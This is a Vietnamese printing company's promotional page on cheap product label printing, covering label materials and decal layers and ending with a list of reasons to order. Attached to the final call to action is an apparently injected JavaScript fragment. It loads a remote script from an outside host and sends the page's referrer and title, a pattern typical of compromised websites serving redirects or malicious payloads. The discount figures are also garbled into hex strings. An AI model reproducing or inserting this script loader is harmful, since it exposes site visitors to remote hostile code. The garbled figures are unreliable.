In ấn - thiết kế

In tem nhãn sản phẩm giá rẻ

In tem nhãn sản phẩm giá rẻ

In tem nhãn sản phẩm giá rẻ

Đánh giá in sản phẩm

 In tem nhãn sản phẩm giá rẻ

In tem nhãn sản phẩm để truyền tải đầy đủ thông tin sản phẩm cũng như thông tin về nhà sản xuất hoặc đơn vị phân phối, được dán bên ngoài bao bì, lọ, hộp…đựng sản phẩm.
Mẫu mã, tem nhãn đòi hỏi thiết kế đẹp, không lạc hậu, không dễ bong tróc trong suốt quá trình bán hàng sau sản xuất…
Trong hàng nghìn mẫu sản phẩm phong phú, để khách hàng nhìn thấy và quyết định lựa chọn sản phẩm của bạn là yếu tố không hề dễ. Sự phối hợp màu sắc, bố cục, phông nền của tem nhãn sản phẩm là những yếu tố giúp cho việc nhận dạng hình ảnh thương hiệu nhanh hơn, và giúp cho khách hàng có thể nhớ được những đặc tính riêng của sản phẩm đó, mặc dù họ có thể mua hàng ở nhiều cửa hàng khác nhau.
Tem, nhãn đẹp tạo ý thức mạnh mẽ về chất lượng phía trong của sản phẩm. Người tiêu dùng khi nhìn một Tem, nhãn được thiết kế đẹp sẽ liên tưởng đến chất lượng tuyệt vời của hàng hóa.

1. Chất liệu in tem nhãn

Tùy theo chất liệu bề mặt bao bì sản phẩm mà tem nhãn được in bằng các chất liệu khác nhau.
Ví dụ: Nhãn dán trên chai lọ thủy tinh, bình nhựa hay tem dán hộp giấy thường dùng chất liệu decal giấy, decal nhựa…, nhãn mác treo trên các sản phẩm thời trang được in bằng các chất liệu giấy cứng như Briston300 gsm, Ford… Nhưng tính thẩm mỹ, tiện dụng và giá thành rẻ đều là những yếu tố không thể thiếu để tạo ra một sản phẩm tem nhãn hàng hóa.
Để có một tem nhãn sản phẩm thiết kế đẹp và có thể in tem nhãn giá rẻ doanh nghiệp cần lưu ý đến kích thước của nhãn sản phẩm, tùy theo khổ giấy in, hình dạng bế, và chất liệu của nhãn sẽ quyết định giá thành phẩm.Ví dụ đối với các doanh nghiệp lớn, ưu tiên sự ấn tượng, đẩy mạnh nhận diện thương hiệu qua sản phẩm của mình thì có thể cân nhắc các thiết kế cầu kỳ vềmàu sắc, hình dạng nhãn để tạo nên sự khác biệt, điều này đồng nghĩa với giá thành nhãn khi in sẽ cao.
Đối với các doanh nghiệp nhỏ, đặc biệt các shop online còn hạn chế về kinh phí, có thể chọn các mẫu tem nhãn sản phẩm đơn giản. Để đảm bảo tính nhận diện và bắt mắt khách hàng cần lưu ý thiết kế nhãn phải hài hòa, có điểm nhấn, thông tin rõ ràng…

In tem nhãn
2. In tem nhãn decal trong

Là một công nghệ khá hiện đại và ngày càng chiếm lĩnh vai trò quan trọng trong ngành in ấn. Đặc biệt hơn, tại TP.Hồ Chí Minh, nơi các ngành sàn xuất, kinh doanh, dịch vụ phát triển nhanh chóng, góp phần tạo nên bộ mặt kinh tế thì ngành in decal trong càng cần thiết. Decal trong thường được sử dụng cho nhiều sản phẩm, nhưng tác dụng chung của decal trong là in logo của nhà cung cấp.
Các công ty in tem nhãn decal trong với những công nghệ hiện đại, in ra nhiều loại decal như: in decal dán xe, decal dán bình đựng nước, logo dán nón bảo hiểm, logo dán máy ATM, nhãn dán mỹ phẩm…Decal trong giá rẻ thường bền, không thấm nước, lâu phai màu và hình thức bắt mắt hơn.

Bên cạnh việc cải tiến chất lượng sản phẩm in, các công ty in ấn còn chú trọng nâng cao chất lượng dịch vụ. Và một trong những bước phát triển đó là dịch vụ in decal lấy ngay.

3. In tem nhãn decal giấy

Là một loại tem được dùng trên các loại sản phẩm hàng hóa mà chất liệu của chúng được làm từ decal giấy.
Tem decal giấy có cấu tạo gồm 4 lớp:

– Lớp bề mặt là giấy: Lớp bề mặt có thể gia công thêm lớp bảo vệ bằng màng mỏng, trong suốt để bảo vệ tem khỏi hơi ẩm và bụi bẩn. Lớp bè mặt giấy chứa các thông tin về sản phẩm và giữ vai trò gây ấn tượng cho khách hàng cũng như việc liên tưởng về một sản phẩm có chất lượng cao được đảm bảo an toàn cho người sử dụng.
– Lớp keo (thường là acrlic): Được phủ dưới lớp mặt dính chặt lớp mặt với các sản phẩm hàng hóa khi dùng.
– Lớp ngăn cách dính: Thường được làm bằn silicon hoặc PE-silicon được phủ lên mặt của lớp đế nhằm ngăn cách lớp đế không cho chúng dính vào lớp keo.
– Lớp đế (có thể là giấy Kraft hay Glassine): Lớp này có tác dụng bảo vệ lớp keo khi chưa sử dụng, chúng dính vào lớp keo tuy nhiên lại có thể bóc ra dễ dàng.

Với đội ngũ thiết kế chuyên nghiệp, giàu kinh nghiệm, hoạt đông lâu năm trong lĩnh vực thiết kế sáng tạo Công ty in Sài Gòn đã triển khai nhiều dự án thiết kế thương hiệu bao bì, in tem vỡ nhanh giá rẻ áp dụng quy trình xây dựng thương hiệu tổng thể đồng bộ, giúp khách hàng xây dựng thương hiệu xuyên suốt từ logo, bộ nhận diện thương hiệu, thương hiểu sản phẩm đến in ấn thành phẩm.
Quy trình khép kín từ thiết kế, in ấn, gia công thành phẩm chất lượng rất cao với máy móc hiện đại, đội ngũ kỹ thuật lành nghề. Đảm bảo tiết kiệm thời gian tối đa cho các bạn

Vì sao nên in tem nhãn sản phẩm tại In Sài Gòn ?

  • Cung cấp dịch vụ tem nhãn sản phẩm trọn gói gồm tư vấn, thiết kế, biên tập nội dung, in ấn, giao hàng.
  • Sử dụng máy in, công nghệ in hiện đại cùng đội ngũ thiết kế chuyên nghiệp.
  • Mực in tem nhãn đúng tiêu chuẩn, không bị mờ, nhòe, lem luốc.
  • Khách hàng được duyệt mẫu trước khi in.
  • Tư vấn nhiệt tình, chu đáo.
  • Đảm bảo giao hàng đúng hẹn, tận nơi.
  • Giá luôn rẽ vì in tại xưởng không qua trung gian.
  • Giảm giá 5{734382cb2d75c8d7b1ec1d8ba5586710cb984dec5ba9b1e3d108c4f601277519} từ lần đặt in thứ 2 và 10{734382cb2d75c8d7b1ec1d8ba5586710cb984dec5ba9b1e3d108c4f601277519} khi in số lượng lớn.

Gọi cho chúng tôi để có những mẫu tem nhãn mác tốt nhất – giá thành rẽ nhất !s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Posted in: Dịch vụ In ấn

Leave a Comment (0) ↓